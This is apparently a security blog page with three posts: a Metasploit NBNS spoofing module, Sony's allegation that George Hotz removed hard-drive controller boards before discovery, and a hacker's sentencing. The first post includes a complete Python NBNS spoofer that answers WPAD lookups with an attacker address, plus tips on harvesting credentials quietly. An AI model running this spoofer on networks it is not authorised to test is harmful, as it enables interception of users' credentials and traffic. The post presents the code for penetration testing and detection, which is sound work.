Tim Medin, over at the excellent Packetstan blog, has just written up a detailed post on the NBNS spoofing module that was added to the latest Metasploit trunk:

This module is based on an old tool of mine, nbnspoof.py, which I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows falls back to a NetBIOS Name Service (NBNS) broadcast lookup once the local and DNS lookups fail: any host on the segment can answer that broadcast, and the requester accepts the first reply it gets. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fall through to NBNS for various reasons (mistyped hostnames and proxy auto-discovery, WPAD, lookups among them).
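To make the mechanics concrete, here is an added example, written for this page and not taken from nbnspoof.py or from Tim’s Metasploit module. It parses an NBNS name query as laid out in RFC 1002, builds the positive name query response a spoofer sends back, and decodes such a response. The decoder doubles as the check a defender would want: query a name that should not exist and feed whatever comes back through it, since any answer at all means something on the segment is spoofing. The sample query bytes, the name WPAD and the address 10.0.0.5 are constructed for illustration.

```python
"""NBNS (NetBIOS Name Service, RFC 1002) query parsing and spoofed
positive-response construction.  Added example for this post; it is not
nbnspoof.py or the Metasploit module.  The sample query, the name WPAD and
the address 10.0.0.5 below are constructed for illustration."""
import socket
import struct

NB_TYPE = 0x0020    # QUESTION_TYPE / RR_TYPE "NB" (general name service RR)
IN_CLASS = 0x0001
HDR = struct.Struct("!HHHHHH")   # NAME_TRN_ID, flags, QD, AN, NS, AR counts


def encode_nb_name(name, suffix=0x00):
    """First-level encoding: pad the name to 15 bytes, append the 1-byte
    suffix, then split every byte into two nibbles and add 'A' to each."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return bytes(b for c in raw for b in ((c >> 4) + 0x41, (c & 0x0F) + 0x41))


def decode_nb_name(encoded):
    """Inverse of encode_nb_name: returns (name without padding, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS names are exactly 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def _name_field(pkt):
    """Layout check for the single name at offset 12: length byte 0x20,
    32 encoded bytes, 0x00 terminator, then TYPE/CLASS.  Returns the
    decoded (name, suffix) or None if the datagram is not shaped that way."""
    if len(pkt) < 50 or pkt[12] != 0x20 or pkt[45] != 0x00:
        return None
    rtype, rclass = struct.unpack("!HH", pkt[46:50])
    if rtype != NB_TYPE or rclass != IN_CLASS:
        return None
    return decode_nb_name(pkt[13:45])


def parse_query(pkt):
    """(trn_id, name, suffix) for a NAME QUERY REQUEST, else None.
    Registration, release and response packets are deliberately ignored."""
    if len(pkt) < HDR.size:
        return None
    trn_id, flags, qd, an, _, _ = HDR.unpack(pkt[:HDR.size])
    if flags & 0x8000 or (flags >> 11) & 0xF != 0 or qd != 1 or an != 0:
        return None     # response bit set, OPCODE is not "query", or odd counts
    q = _name_field(pkt)
    return None if q is None else (trn_id, q[0], q[1])


def build_response(trn_id, name, suffix, spoof_ip, ttl=300000):
    """POSITIVE NAME QUERY RESPONSE mapping NAME to spoof_ip, echoing the
    requester's TRN_ID.  Flags 0x8500 = response, authoritative, RD."""
    rdata = struct.pack("!H4s", 0x0000, socket.inet_aton(spoof_ip))  # NB_FLAGS: unique, B-node
    answer = (b"\x20" + encode_nb_name(name, suffix) + b"\x00"
              + struct.pack("!HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata)
    return HDR.pack(trn_id, 0x8500, 0, 1, 0, 0) + answer


def parse_response(pkt):
    """(trn_id, name, ip) from a positive name query response, else None.
    Defender's use: query a name that does not exist; an answer means a
    spoofer is on the segment, and the ip field tells you where."""
    if len(pkt) < 62:
        return None
    trn_id, flags, _, an, _, _ = HDR.unpack(pkt[:HDR.size])
    q = _name_field(pkt)
    if not flags & 0x8000 or flags & 0x000F or an < 1 or q is None:
        return None     # not a response, RCODE signals an error, or no answer RR
    return trn_id, q[0], socket.inet_ntoa(pkt[58:62])


def spoof_reply(pkt, spoof_ip, wanted=None):
    """Response bytes for a query we choose to answer, else None.  `wanted`
    limits spoofing to chosen names (e.g. {"WPAD"}) instead of every lookup."""
    q = parse_query(pkt)
    if q is None or (wanted is not None and q[1] not in wanted):
        return None
    return build_response(q[0], q[1], q[2], spoof_ip)


# Constructed sample: a Windows-style broadcast query (flags 0x0110 =
# recursion desired + broadcast) for the workstation name WPAD, TRN_ID 0x1234.
SAMPLE_QUERY = (HDR.pack(0x1234, 0x0110, 1, 0, 0, 0)
                + b"\x20" + encode_nb_name("WPAD") + b"\x00"
                + struct.pack("!HH", NB_TYPE, IN_CLASS))


def run_spoofer(spoof_ip, wanted=None):
    """Answer matching broadcast queries on UDP/137.  Needs root, and no
    local NetBIOS daemon (e.g. nmbd) already holding the port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.bind(("0.0.0.0", 137))
    while True:
        pkt, peer = sock.recvfrom(1024)
        reply = spoof_reply(pkt, spoof_ip, wanted)
        if reply:
            sock.sendto(reply, peer)
            print("answered %s for %s -> %s" % (peer[0], parse_query(pkt)[1], spoof_ip))


if __name__ == "__main__":
    run_spoofer("10.0.0.5", wanted={"WPAD"})
```

Restricting the names answered (the `wanted` set) matters in practice: answering every stray lookup on a busy segment is noisy and breaks things for users, while answering only the names you expect to be absent (WPAD being the usual one) gets the credentials or connections you are after with far less collateral damage.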

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Because it is integrated into the current Metasploit framework, I recommend it over the original Python version. Maybe one day soon I’ll one-up him and turn it into a Meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-)

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to DEF CON (and will submit it to Black Hat tomorrow, once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I hope to see some of my readers there!


EDIT: I have found some clarification about the “controller cards”, seemingly confirming what I have posted, and have added thoughts to the end of this post.

Today, on the Wired Threat Level blog, there is a story that covers Sony’s allegations that George Hotz (“geohot”), whom they are suing for DMCA violations involving a PlayStation 3 jailbreak, sabotaged hard drives provided for discovery and skipped town.

Skipping town to South America is not in my area of expertise, so I’m not commenting on whether or not that is happening, but forensic acquisition and analysis of hard drives happens to be my current bread and butter. The Wired article reports that Sony claims Hotz provided the hard drives in a non-functional state, and it links to a PDF from the case’s filings that gives the exact wording of Sony’s complaint on page 22:

Despite Judge Spero’s orders, Hotz continues to frustrate all attempts to complete jurisdictional discovery. In yet another attempt to avoid his deposition and a limited inspection of his impounded hard drives, on March 17, 2011, Hotz filed a motion for protective order on issues already decided by Judge Spero. (Docket No. 100.) On the same day, TIG discovered that prior to delivery, Hotz had removed integral components from his impounded hard drives, rendering them completely non-functional. Bricker Decl., ¶21, Exh. S. When SCEA echoed TIG’s request that the components of the hard drives be delivered immediately, Hotz’s counsel responded that Hotz was in South America.

Hotz’s attorney responded to Wired with the following:

They didn’t have the controller card attached. That’s it

The attorney, I assume, does not have an extensive technical background, and likely gave this comment off the cuff (or as “off the cuff” as any attorney will allow themselves to be). Therefore, this is going to take some interpretation. The first question is what is meant by “controller card”. When it comes to hard drives, two things come to mind:

  • The interface between the motherboard’s chipset and the hard drive. On most motherboards the SATA or IDE interface is integrated into the board itself. If an end user has added a SATA drive to an older computer, a SATA “controller card”, in the literal “card” sense, may be slotted into the motherboard to interface with the newer drive.
  • The circuit board attached to the drive itself, which handles ATA communication on one side and drives the drive’s electrical and mechanical internals (spindle motor, head actuator, read channel) on the other. To illustrate, it’s the part facing the camera in this image:

The Underside of a Hard Drive

The latter is what I assume is meant, for the following reasons:

  • It’s something that could be removed from a drive, as the filing states.
  • Controller cards in the sense of a slotted card on a motherboard aren’t very common right now. Most computers have the interface they need on the motherboard.
  • Even if it were a SATA, IDE, or even SCSI controller card meant to be slotted into a motherboard, withholding that card would not render the drive unreadable to a well-outfitted forensics lab such as TIG (the third-party forensic examiner Sony is using); any such lab has its own controllers and write blockers for every common interface.

Now, I do not support Sony’s lawsuit against George Hotz, but it seems to me that if he did remove those controller boards from the drives, this is a case of needlessly antagonizing the opposing counsel, examiners, and the judge. I really don’t think it’s a good idea to intentionally do this when providing evidence under a court order.

Those boards don’t just fall off, and their absence is not as easy to overcome as Hotz’s attorney implies. To read a drive that has had this board removed, you need an identical board. Those who do data recovery in cases where this board has been damaged know that extreme care needs to be taken in finding a replacement. Even drives of the same model and capacity can have different revisions of these boards, and it’s crucial to get a match. On many drives the board also carries calibration (“adaptive”) data specific to that particular head and platter assembly in a flash chip, so the usual recovery technique is to move that chip from the original board onto a donor board of the matching revision; with the original board gone, that step is impossible. Even a forensics firm such as TIG is not likely to maintain a stockpile of controller boards for assorted drives, as it would be prohibitively expensive to buy and file “one of everything”. The absence of the board (rather than just its failure) makes things harder still, as without the original to compare against it may not even be possible to determine which board revision is the right replacement.

While I disagree with the basis of the lawsuit and support the opening of electronic devices (all of my and my spouse’s Apple iPods, iPhones, and iPads are jailbroken), if this is the method being used to stall the plaintiff and case progress, I see that as being in bad form for Hotz, and a bigger issue than his attorney lets on. Hopefully not. Don’t make it hard for me to like you, geohot! Take the high road.

EDIT: I found the exhibit with the discussion of the missing hard drive parts at Groklaw:

This pretty much confirms the above with the following quotes from an examiner at TIG:

This controller card is installed at the factory and not normally removed or handled by an end user.

We took the drives out of our evidence locker and the evidence bag to image them in their current encrypted state as stated in the order and agreed to on our phone call yesterday. We have determined that the controller cards which are screwed onto the hard drives were removed prior to them being given to us. Therefore we are unable to operate the hard drives in their current state. Keep in mind that we need two days to image these drives as we have to image two 1TB drives.

It’s difficult to imagine a reason Hotz would have had to remove the circuit boards from the drives he was ordered to turn over. It will be very interesting to see why he did this. From my position, I can’t see this as being productive for anything other than antagonizing the opposing party and, more importantly, the judge.


Jesse William McGraw, who pleaded guilty to two counts of transmitting malicious code to systems at the hospital at which he worked (including the HMI of a SCADA HVAC system), was sentenced yesterday at the U.S. District Court for the Northern District of Texas to 110 months of custody, followed by three years of supervised release. He has also been ordered to pay restitution in the amount of $31,881.75. This is according to the latest filing on his case on PACER:

He was facing a maximum of 10 years per count, which is higher than the usual 5 years per count because of the threat to public health and safety. At one point in the case last year, he had signed a plea agreement stating that he would plead guilty in exchange for a maximum sentence of 6 years. This fell through, however, when he reneged on the deal by pleading not guilty at his next court appearance. He was then re-indicted on 14 counts, which were dropped after he agreed to (and did) plead guilty to the original two counts, outside the scope of any agreement.

On a personal note, I feel that this is a fair sentence considering the circumstances. His actions jeopardized the safety of innocent people, and after he was taken into custody he attempted to destroy evidence and hinder the investigation. Even after he finally pleaded guilty, he continued to blame everyone but himself, as you can see in the “cross-site scripting tunneling” story he posted, or had someone post for him, from prison three months ago. I originally felt very sorry for him, but it’s hard to have any sympathy for someone who has acted against his own best interests for as long as he has.

The rest of the “Electronik Tribulation Army” have gone relatively quiet. Maybe this will be a wakeup call for them to get out of this game.

UPDATE: A good post on this from the folks at the Dallas Observer:

If you’re new to the site, these are the previous posts that this is a follow-up to:

© 2012 McGrew Security